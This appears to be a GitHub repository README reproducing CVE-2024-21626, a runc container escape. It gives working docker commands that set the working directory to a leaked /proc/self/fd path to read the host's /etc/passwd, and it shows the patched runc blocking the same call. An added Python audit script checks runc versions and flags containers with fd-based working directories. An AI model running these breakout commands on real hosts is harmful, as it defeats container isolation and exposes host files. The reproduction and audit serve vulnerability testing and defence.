zhangguanzhang / CVE-2024-21626


Steps to reproduce

Ensure the kernel is >= (5.4, 4.19, ..) and that openat2 appears in /proc/kallsyms. Affected runc versions: v1.0.0-rc93 <= runc <= 1.1.11

$ grep openat2 /proc/kallsyms
ffffffffa64290d0 T __pfx___audit_openat2_how
ffffffffa64290e0 T __audit_openat2_how
ffffffffa666de90 t __pfx_do_sys_openat2
ffffffffa666dea0 t do_sys_openat2
ffffffffa666e020 t __pfx___do_sys_openat2
ffffffffa666e030 t __do_sys_openat2
ffffffffa666e150 T __pfx___x64_sys_openat2
ffffffffa666e160 T __x64_sys_openat2
ffffffffa666e190 T __pfx___ia32_sys_openat2
ffffffffa666e1a0 T __ia32_sys_openat2
ffffffffa69871e0 T __pfx_io_openat2_prep
ffffffffa69871f0 T io_openat2_prep
ffffffffa6987280 T __pfx_io_openat2
ffffffffa6987290 T io_openat2
ffffffffa863d1e0 d event_exit__openat2
ffffffffa863d260 d event_enter__openat2
ffffffffa863d2e0 d __syscall_meta__openat2
ffffffffa863d320 d args__openat2
ffffffffa863d340 d types__openat2
ffffffffa8affb48 d __event_exit__openat2
ffffffffa8affb50 d __event_enter__openat2
ffffffffa8b02b18 d __p_syscall_meta__openat2
ffffffffa8b056f0 d _eil_addr___ia32_sys_openat2
ffffffffa8b05700 d _eil_addr___x64_sys_openat2

Read a host file:

$ tail -n1 /etc/passwd
gnome-initial-setup:x:126:65534::/run/gnome-initial-setup/:/bin/false
$ seq 10 | while read line;do docker run --rm -w /proc/self/fd/$line ubuntu tail -n1 ../../../../../etc/passwd |& grep -Ev Error ; done
gnome-initial-setup:x:126:65534::/run/gnome-initial-setup/:/bin/false

Get the fd number:

$ seq 10 | while read line;do docker run --rm -w /proc/self/fd/$line -tid --name s-$line ubuntu   ; done
$ docker ps -a | grep -P 's-\d$'
c171e8ac9a1a  ubuntu    "bash"  About a minute ago   Up About a minute  s-7

The number is 7 on my machine; exec into the old container:

$ docker exec -ti -w /proc/self/fd/7 xxxxx tail -n1 /proc/self/cwd/../../../../../etc/passwd
gnome-initial-setup:x:126:65534::/run/gnome-initial-setup/:/bin/false

After replacing runc:

$ cp runc.amd64 /usr/bin/runc
$ docker exec -ti -w /proc/self/fd/7 xxxxx tail -n1 /proc/self/cwd/../../../../../etc/passwd
OCI runtime exec failed: exec failed: unable to start container process: chdir to cwd ("/proc/self/fd/7") set in config.json failed: not a directory: unknown: Are you trying to mount a directory onto a file (or vice-versa)? Check if the specified host path exists and is the expected type
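
A defender-side check for the conditions reproduced above, as an added example that is not part of the original repository: it tests `runc --version` text against the affected range stated on this page and flags containers whose configured working directory sits under `/proc/.../fd/<n>`. The function names and sample data are constructed for illustration, and matching `/proc/<pid>` and `thread-self` generalizes the `/proc/self/fd/N` form used above.

```python
import posixpath
import re

# Range stated on the page: v1.0.0-rc93 <= runc <= 1.1.11.
FIRST_AFFECTED = (1, 0, 0, 93)
LAST_AFFECTED = (1, 1, 11, float("inf"))

_VERSION = re.compile(r"(\d+)\.(\d+)\.(\d+)(?:-rc\.?(\d+))?")
_FD_CWD = re.compile(r"^/proc/(?:self|thread-self|\d+)/fd/\d+(?:/|$)")


def parse_runc_version(text):
    """Return (major, minor, patch, rc); a final release gets rc = infinity."""
    m = _VERSION.search(text)
    if m is None:
        raise ValueError(f"no runc version found in {text!r}")
    major, minor, patch, rc = m.groups()
    return (int(major), int(minor), int(patch), float("inf") if rc is None else int(rc))


def runc_in_affected_range(text):
    return FIRST_AFFECTED <= parse_runc_version(text) <= LAST_AFFECTED


def cwd_points_at_fd(cwd):
    """True if a working directory resolves lexically under /proc/<x>/fd/<n>."""
    return bool(cwd) and _FD_CWD.match(posixpath.normpath(cwd)) is not None


def audit(runc_version_text, containers):
    """containers: list of dicts shaped like `docker inspect` output."""
    flagged = [c["Name"] for c in containers
               if cwd_points_at_fd(c.get("Config", {}).get("WorkingDir", ""))]
    return {"runc_affected": runc_in_affected_range(runc_version_text),
            "fd_workdir_containers": flagged}


# Constructed sample input (not taken from a real host).
SAMPLE_VERSION = "runc version 1.1.11\nspec: 1.0.2-dev\n"
SAMPLE_CONTAINERS = [
    {"Name": "/web", "Config": {"WorkingDir": "/app"}},
    {"Name": "/s-7", "Config": {"WorkingDir": "/proc/self/fd/7"}},
    {"Name": "/job", "Config": {"WorkingDir": "/proc/self/../self/fd/8/"}},
    {"Name": "/dbg", "Config": {"WorkingDir": ""}},
]

if __name__ == "__main__":
    print(audit(SAMPLE_VERSION, SAMPLE_CONTAINERS))
```

`Config.WorkingDir` only records the `docker run -w` value; a working directory passed to `docker exec -w` is not stored in the container's configuration. Distribution packages may carry the fix under an older version string, so treat the version check as a first pass.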
